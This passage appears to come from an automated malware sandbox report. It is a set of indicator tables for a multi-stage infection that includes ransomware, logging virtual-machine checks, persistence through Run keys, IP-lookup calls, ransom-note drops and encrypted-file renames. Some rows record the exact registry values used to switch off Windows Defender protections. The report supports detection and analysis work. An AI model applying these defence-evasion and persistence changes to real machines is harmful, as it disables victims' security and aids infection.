| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\tdQsgapgd7CCgb2Nac7hGQFU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\NUc1s3wqp1OTSn6gv7mG4x9h.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\5AA1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\A9EC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\lgJGQ8WVm0TB30ZFEEjC5Nff.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\A9EC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\DA0SNTjID05uVTiLF3fjEqmT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\lgJGQ8WVm0TB30ZFEEjC5Nff.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\5AA1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\PpQsW20a0P92HEBP_c6swrBX.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\686.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\DA0SNTjID05uVTiLF3fjEqmT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\J6vAkH5kawOVLHYY8QC6PvMX.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\NUc1s3wqp1OTSn6gv7mG4x9h.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\UkdBd92nKdEVxt7NH_xJ86WB.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\B826.exe | N/A |
Loads dropped DLL
Reads local data of messenger clients
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\EA23.exe = "0" | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
Accesses 2FA software files, possible credential harvesting
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\INL Corpo Brovse\\Guxexushivy.exe\"" | C:\Users\Admin\AppData\Local\Temp\is-GRJB0.tmp\3377047_logo_media.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | C:\Users\Admin\AppData\Roaming\2354821.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\Temp\E77.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\TrustedInstaller.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\TrustedInstaller.exe\" -start" | C:\Users\Admin\AppData\Local\Temp\E77.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\ | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Cleaner = "C:\\Users\\Admin\\AppData\\Roaming\\Cleaner\\Cleaner.exe --anbfs" | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\s27w7dhtXK2yj0R0i9jmP7AH.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\83C5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\A9EC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\B826.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\686.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\dKoMKenWr0odB6tjTFVUEYzN.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\DA0SNTjID05uVTiLF3fjEqmT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\lgJGQ8WVm0TB30ZFEEjC5Nff.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\PpQsW20a0P92HEBP_c6swrBX.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\UkdBd92nKdEVxt7NH_xJ86WB.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\J6vAkH5kawOVLHYY8QC6PvMX.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\tdQsgapgd7CCgb2Nac7hGQFU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\I7r1FrUEwNmYSO5O6BudkuEm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\NUc1s3wqp1OTSn6gv7mG4x9h.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\5AA1.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | geoiptool.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{64f23e3a-d748-0d46-a3b6-1b57e42d340e}\SET963C.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{64f23e3a-d748-0d46-a3b6-1b57e42d340e}\tap0901.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{64f23e3a-d748-0d46-a3b6-1b57e42d340e}\SET963D.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{64f23e3a-d748-0d46-a3b6-1b57e42d340e}\tap0901.cat | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| File created | C:\Windows\System32\DriverStore\drvstore.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{64f23e3a-d748-0d46-a3b6-1b57e42d340e} | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{64f23e3a-d748-0d46-a3b6-1b57e42d340e}\SET963C.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{64f23e3a-d748-0d46-a3b6-1b57e42d340e}\oemvista.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{64f23e3a-d748-0d46-a3b6-1b57e42d340e}\SET963D.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{64f23e3a-d748-0d46-a3b6-1b57e42d340e}\SET963E.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{64f23e3a-d748-0d46-a3b6-1b57e42d340e}\SET963E.tmp | C:\Windows\system32\DrvInst.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\osfFPA\addins.xml.payfast.146-F3E-F86 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.40978.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-80_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsNotepad_10.2103.6.0_x64__8wekyb3d8bbwe\Assets\NotepadAppList.targetsize-20.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_1.21052.124.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\StoreLogo.scale-400_contrast-black.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\pubs.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20920.0_x64__8wekyb3d8bbwe\images\PreviewMailList.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_1.21052.124.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\AppIcon.scale-200_contrast-black.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\lib-commonjs\createTheme.js | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Access2019VL_KMS_Client_AE-ul-oob.xrm-ms | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_2021.427.1821.0_neutral_~_8wekyb3d8bbwe\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\OneNoteVL_MAK-ppd.xrm-ms | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.2103.1172.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\FeedbackHubSplashScreen.scale-100_altform-colorful.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019VL_KMS_Client_AE-ul.xrm-ms.payfast.146-F3E-F86 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\offsym.ttf.payfast.146-F3E-F86 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File created | C:\Program Files\Microsoft Office 15\ClientX64\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_1.0.6.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\WeatherSmallTile.scale-125_contrast-white.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.40978.0_x64__8wekyb3d8bbwe\Assets\BadgeLogo.scale-150.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20920.0_x64__8wekyb3d8bbwe\images\SwipeTeachingCalloutImage.layoutdir-RTL.gif | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ExcelVL_MAK-ul-oob.xrm-ms | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20920.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarMediumTile.scale-100.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2103.8.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-80.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_1.21052.124.0_x64__8wekyb3d8bbwe\Assets\Devices\Frames\FoldFrameDouble.svg | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib-amd\CommandBar.js | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\SDXHelper.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_KMS_Client_AE-ul.xrm-ms.payfast.146-F3E-F86 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_1.21052.124.0_x64__8wekyb3d8bbwe\Assets\PhoneNotifications\theme-dark\DevicePermission.svg | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial5-ul-oob.xrm-ms | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\AccessRuntimeR_PrepidBypass-ppd.xrm-ms | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\mecontrol.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.21012.10511.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\Logo.scale-125_contrast-black.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.PowerAutomateDesktop_1.0.65.0_x64__8wekyb3d8bbwe\Images\contrast-black\PowerAutomateAppIcon.altform-lightunplated_targetsize-256.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2020.20120.4004.0_x64__8wekyb3d8bbwe\Data\StreamingAssets\10175_upward_dust_explosion.json | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsStore_12105.1001.23.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxManifest.xml | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Office 2007 - 2010.xml.payfast.146-F3E-F86 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.GamingApp_2105.900.24.0_x64__8wekyb3d8bbwe\Assets\Xbox_LargeTile.scale-200.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.21061.10121.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-256_contrast-black.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-3B18I.tmp | C:\Users\Admin\AppData\Local\Temp\is-B06BN.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\msotd.exe.payfast.146-F3E-F86 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsNotepad_10.2103.6.0_x64__8wekyb3d8bbwe\Assets\contrast-black\NotepadAppList.targetsize-80.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_1.21052.124.0_x64__8wekyb3d8bbwe\Assets\Calling\CallingPCConsent.svg | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.YourPhone_1.21052.124.0_x64__8wekyb3d8bbwe\YourPhoneAppProxy\zh-TW\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_neutral_~_cw5n1h2txyewy\AppxSignature.p7x | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription1-pl.xrm-ms.payfast.146-F3E-F86 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-black_scale-100.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EDGE\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.GamingApp_2105.900.24.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\Xbox_MedTile.scale-125_contrast-black.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.GamingApp_2105.900.24.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\Xbox_SmallTile.scale-100_contrast-black.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.40978.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SplashScreen.scale-200_contrast-black.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2106.12410.0_neutral_split.scale-100_8wekyb3d8bbwe\Images\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml.payfast.146-F3E-F86 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Grace-ppd.xrm-ms | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\rsod\officemuiset.msi.16.en-us.boot.tree.dat | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SONORA\PREVIEW.GIF | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Access2019VL_MAK_AE-ul-oob.xrm-ms.payfast.146-F3E-F86 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.54.4001.0_x64__8wekyb3d8bbwe\KnownGameList.bin | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingNews_1.0.6.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\NewsAppList.targetsize-16_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
